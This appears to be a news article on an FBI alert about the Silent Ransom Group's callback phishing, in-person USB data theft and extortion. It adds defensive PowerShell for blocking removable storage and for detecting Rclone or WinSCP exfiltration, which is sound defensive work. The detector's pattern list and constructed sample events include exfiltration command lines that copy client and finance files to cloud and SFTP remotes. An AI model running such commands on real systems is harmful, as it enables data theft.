The Federal Bureau of Investigation (FBI) has issued a stark warning about a new and alarming tactic employed by the Silent Ransom Group (SRG), a cyber extortion gang that has been active since at least 2022. According to a May 2025 FBI alert, SRG has escalated its attacks by sending operatives in person to victim locations to physically insert USB drives or external hard drives into computers, allowing them to steal sensitive data directly.
SRG, also tracked as Luna Moth, initially gained notoriety for targeting law firms in the United States starting in 2023. The group's earlier modus operandi was callback phishing: emails claiming a small subscription charge was about to be billed and urging the recipient to call a phone number to cancel it. On the call, the attacker, posing as customer support, talked the victim into installing remote access software, which gave the attackers a foothold on the victim's machine and network. Once inside, they would quickly exfiltrate data, usually without deploying the file-encrypting ransomware that the "Silent Ransom" name alludes to.
The New In-Person Attack Vector
The FBI's latest alert, published as a PDF, details a significant evolution in SRG's attack strategy. The threat actor now directly calls employees of target organizations or sends phishing emails that urge them to contact a number answered by the attacker, who poses as a member of the victim's own IT department. During the ensuing phone call, the attacker instructs the employee to grant remote desktop access to their computer under the guise of troubleshooting a supposed issue related to the phishing email.
However, the most disturbing twist is when this remote access attempt fails. In such cases, SRG dispatches an individual—posing as an IT support technician—to the victim's physical location. This person arrives with a USB drive or external hard drive and tells the employee that they need to "image the device" or "create a backup file" to address potential impacts from the phishing email. The FBI notes that this in-person social engineering is highly effective because it bypasses many digital defenses.
Data Exfiltration Without Ransomware
Once the attacker gains access to the machine, either remotely or by physically inserting a drive, they escalate privileges where needed and begin exfiltrating data. Unlike most ransomware groups, SRG does not typically encrypt files. Instead, they focus on stealing as much sensitive information as possible before issuing an extortion demand. The FBI reports that SRG uses legitimate tools for data exfiltration, such as WinSCP (Windows Secure Copy) or a modified version of Rclone. In some cases, they copy stolen data to cloud file-sharing platforms like Google Drive and Microsoft OneDrive, so the outbound traffic blends in with ordinary business use of those services and is harder to spot.
The group then contacts the victim organization, threatening to sell or publicly release the stolen data unless a ransom is paid. To increase pressure, SRG also contacts the victim's employees and clients, exposing the breach and potentially leaking their personal information. This theft-and-pressure extortion model, with no encryption at all, has proven highly lucrative for the group.
Why This Tactic Is So Dangerous
The FBI's alert emphasizes that these recent SRG campaigns leave few artifacts on compromised machines. Because the attackers use legitimate system management or remote access tools—tools that are already whitelisted in many corporate environments—traditional antivirus products are unlikely to flag the intrusion. The in-person attack vector adds an additional layer of complexity: physical security teams may not be trained to question a person wearing an IT badge and carrying a laptop bag, especially if the person displays confidence and knowledge of internal procedures.
This tactic represents a convergence of cyber and physical threats. Organizations that have invested heavily in digital defenses—firewalls, endpoint detection, multi-factor authentication—may still be vulnerable if an attacker can simply walk through the front door and plug a USB drive into an unlocked computer. The human element remains the weakest link, as employees are conditioned to trust someone who appears to be from IT.
Background on Silent Ransom Group
Silent Ransom Group emerged in 2022 as a relatively low-profile but effective extortion operation. The group's name is somewhat misleading, as they rarely use ransomware; instead, they focus on data theft and extortion. Cybersecurity researchers have linked SRG to other threat groups, though the exact affiliation remains unclear. The group primarily targets law firms, but has also been observed attacking healthcare and financial services organizations. The FBI's alert suggests that the group's operators are likely based in Eastern Europe, though attribution is ongoing.
SRG's evolution from simple phishing to in-person infiltration demonstrates a growing trend among sophisticated cybercriminals: they are willing to invest time, money, and personnel to breach high-value targets. The use of USB drives as an attack vector is not new—the infamous Stuxnet worm was spread via USB—but the combination with impersonation of IT support and physical presence makes this a uniquely dangerous campaign.
Recommendations for Defense
The FBI's alert provides a comprehensive list of recommendations for organizations to protect against SRG and similar threats. First and foremost, organizations should verify the credentials of all individuals who request access to company assets, whether remotely or in person. Employees should be trained to independently verify any computer support requests by calling the IT department using a known number, not one provided in an email or phone call.
Technical controls are also critical. Organizations should limit access to sensitive data to only those who need it, following the principle of least privilege. Training employees to recognize phishing attempts—both email and voice—is essential. Establishing clear policies for IT support communications and authentication, such as requiring a unique ticket number for any remote session, can help prevent social engineering attacks.
Data backups remain a vital safety net. All company data should be backed up regularly, with backups stored offline or in an immutable format. Implementing phishing-resistant multi-factor authentication (MFA), such as hardware security keys or biometric verification, blocks logins with stolen credentials; note, however, that it does not stop an employee who knowingly starts a remote session for a fake technician, which is why the verification procedures above come first. Additionally, organizations should block access to commonly exploited ports and disable remote access features unless explicitly needed. Finally, permissions for external drive installation should be disabled on endpoints, so that an unauthorized USB drive plugged into a workstation simply does not mount.
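The last control, blocking removable storage on endpoints, is the one most directly aimed at the in-person visit. The script below is an added example, not from the FBI alert or the SecurityWeek article: it writes the same registry values that the Windows "Removable Storage Access: All Removable Storage classes: Deny all access" Group Policy sets, optionally disables the USB mass-storage driver as well, and reports whether the host is in the hardened state. The function names are this example's own; the registry paths and values are standard Windows ones.

```powershell
# Added example (not part of the FBI alert or the article): deny removable
# storage on a Windows endpoint, then verify the result. Run as Administrator,
# and pilot it first: Deny_All also blocks legitimate USB disks, so pair it
# with an exception process for the people who really need them.
#Requires -RunAsAdministrator

# Key written by the "Removable Storage Access" Group Policy.
$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\RemovableStorageDevices'
# Service key for the USB mass-storage class driver.
$UsbStorKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'

function Set-RemovableStorageDeny {
    param([switch]$DisableUsbStorDriver)

    # Deny_All = 1 is "All Removable Storage classes: Deny all access".
    # It applies to devices attached after the value is set; no reboot needed.
    New-Item -Path $PolicyKey -Force | Out-Null
    Set-ItemProperty -Path $PolicyKey -Name 'Deny_All' -Value 1 -Type DWord

    if ($DisableUsbStorDriver) {
        # Belt and braces: keep the USB mass-storage driver from loading at all.
        # Start = 4 is Disabled; 3 (Manual) is the Windows default.
        Set-ItemProperty -Path $UsbStorKey -Name 'Start' -Value 4 -Type DWord
    }
}

function Test-RemovableStorageDeny {
    # Reads both settings back and reports whether each control is in place.
    $denyAll  = (Get-ItemProperty -Path $PolicyKey  -Name 'Deny_All' -ErrorAction SilentlyContinue).Deny_All
    $usbStart = (Get-ItemProperty -Path $UsbStorKey -Name 'Start'    -ErrorAction SilentlyContinue).Start
    [pscustomobject]@{
        DenyAllPolicy   = ($denyAll -eq 1)
        UsbStorDisabled = ($usbStart -eq 4)
        Hardened        = ($denyAll -eq 1 -and $usbStart -eq 4)
    }
}

Set-RemovableStorageDeny -DisableUsbStorDriver
Test-RemovableStorageDeny | Format-List
```

In a domain, push the same values through Group Policy rather than per-host scripts, and keep Test-RemovableStorageDeny in your compliance checks so that a host whose policy has been tampered with or never applied shows up as Hardened = False.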
The FBI also advises organizations to monitor for unusual use of legitimate tools like Rclone or WinSCP, which SRG uses for data exfiltration, bearing in mind that the group has used a modified Rclone build and that either tool may be renamed on disk. Anomaly detection systems can alert security teams to large outbound data transfers or unusual file access patterns.
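What that monitoring looks like in practice, as an added example that is not part of the FBI alert or the article: the script below classifies Windows process-creation records (the fields mirror Sysmon Event ID 1) and flags Rclone or WinSCP executions, including copies renamed on disk, whose PE version resource still reports the original file name, together with command lines that look like bulk transfers to a remote. The sample records, the command-line patterns and the list of remote-support parent processes are this example's own assumptions, and Get-SysmonProcessCreate shows how to feed real events from the live log into the same check.

```powershell
# Added example (not from the FBI alert or the article): flag process-creation
# events that look like Rclone/WinSCP exfiltration. The four sample events
# below are constructed for the demonstration.

# Tools named in the FBI alert, keyed by the OriginalFileName baked into the PE.
$ExfilTools = @{ 'rclone.exe' = 'Rclone'; 'winscp.exe' = 'WinSCP' }

# Command-line shapes typical of bulk transfer to a remote (heuristics, assumed).
$ExfilCmdPatterns = @(
    '\brclone\b.*\b(copy|sync|move)\b',           # rclone copy <src> <remote:path>
    '\b(copy|sync|move)\b\s+\S+\s+[A-Za-z][\w-]+:', # any verb with a "remote:" destination (not a drive letter)
    '--config\s',                                   # rclone pointed at a dropped config file
    '\bWinSCP\b.*/(command|script)\b',              # WinSCP scripted transfers
    '\b(sftp|ftps?)://'                             # explicit remote URL on the command line
)

# Remote-support tools an SRG caller might have talked the user into running (assumed list).
$RemoteAccessParents = 'anydesk|teamviewer|screenconnect|quickassist|splashtop'

function Test-ExfilToolEvent {
    param([Parameter(Mandatory)][hashtable]$Event)

    $imageName = [IO.Path]::GetFileName([string]$Event.Image).ToLowerInvariant()
    $origName  = ([string]$Event.OriginalFileName).ToLowerInvariant()
    $cmd       = [string]$Event.CommandLine
    $reasons   = [System.Collections.Generic.List[string]]::new()

    if ($ExfilTools.ContainsKey($origName)) {
        if ($imageName -ne $origName) {
            # File renamed on disk but the version resource still says rclone/WinSCP.
            $reasons.Add("renamed $($ExfilTools[$origName]) binary ($imageName)")
        } else {
            $reasons.Add("$($ExfilTools[$origName]) execution")
        }
    }
    foreach ($p in $ExfilCmdPatterns) {
        if ($cmd -match $p) { $reasons.Add("command line matches '$p'"); break }
    }
    # A transfer tool launched from inside a remote-support session is the SRG pattern.
    if ($reasons.Count -gt 0 -and [string]$Event.ParentImage -match $RemoteAccessParents) {
        $reasons.Add("spawned from remote-access parent $([IO.Path]::GetFileName([string]$Event.ParentImage))")
    }

    [pscustomobject]@{
        Image      = $imageName
        User       = $Event.User
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

function Get-SysmonProcessCreate {
    # Pulls live Sysmon Event ID 1 records into the same hashtable shape.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            $d
        }
}

# Constructed sample events (not real telemetry).
$SampleEvents = @(
    @{ Image = 'C:\Users\jdoe\AppData\Local\Temp\svchost-update.exe'; OriginalFileName = 'rclone.exe'
       CommandLine = 'svchost-update.exe copy "C:\Clients" gdrive:backup --transfers 8'
       ParentImage = 'C:\Program Files\AnyDesk\AnyDesk.exe'; User = 'CORP\jdoe' },
    @{ Image = 'C:\Program Files (x86)\WinSCP\WinSCP.exe'; OriginalFileName = 'WinSCP.exe'
       CommandLine = '"C:\Program Files (x86)\WinSCP\WinSCP.exe" /command "open sftp://backup@198.51.100.7/" "put C:\Finance\*" "exit"'
       ParentImage = 'C:\Windows\explorer.exe'; User = 'CORP\asmith' },
    @{ Image = 'C:\Windows\System32\notepad.exe'; OriginalFileName = 'NOTEPAD.EXE'
       CommandLine = 'notepad.exe C:\Users\jdoe\notes.txt'; ParentImage = 'C:\Windows\explorer.exe'; User = 'CORP\jdoe' },
    @{ Image = 'C:\Program Files\rclone\rclone.exe'; OriginalFileName = 'rclone.exe'
       CommandLine = 'rclone.exe sync D:\Backups s3backup:corp-backups --config C:\ProgramData\rclone\rclone.conf'
       ParentImage = 'C:\Windows\System32\svchost.exe'; User = 'NT AUTHORITY\SYSTEM' }
)

$SampleEvents | ForEach-Object { Test-ExfilToolEvent -Event $_ } |
    Where-Object Suspicious | Format-Table Image, User, Reasons -AutoSize
```

The first two sample events are flagged for the renamed Rclone copy launched from AnyDesk and for the scripted WinSCP upload; the fourth, a scheduled backup, is flagged too, which is the point: the check surfaces every Rclone run, and known backup jobs are then allow-listed by binary hash, parent process and service account rather than by file name, since a file name is exactly what SRG changes.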
This latest SRG campaign is a stark reminder that cybersecurity is not just about digital defenses. Physical security measures—including visitor management, badge systems, and employee awareness—are equally important. As cybercriminals become more creative, organizations must adopt a holistic approach that combines technology, processes, and a security-aware culture to defend against evolving threats like the one described in the FBI's alert.
Source: SecurityWeek News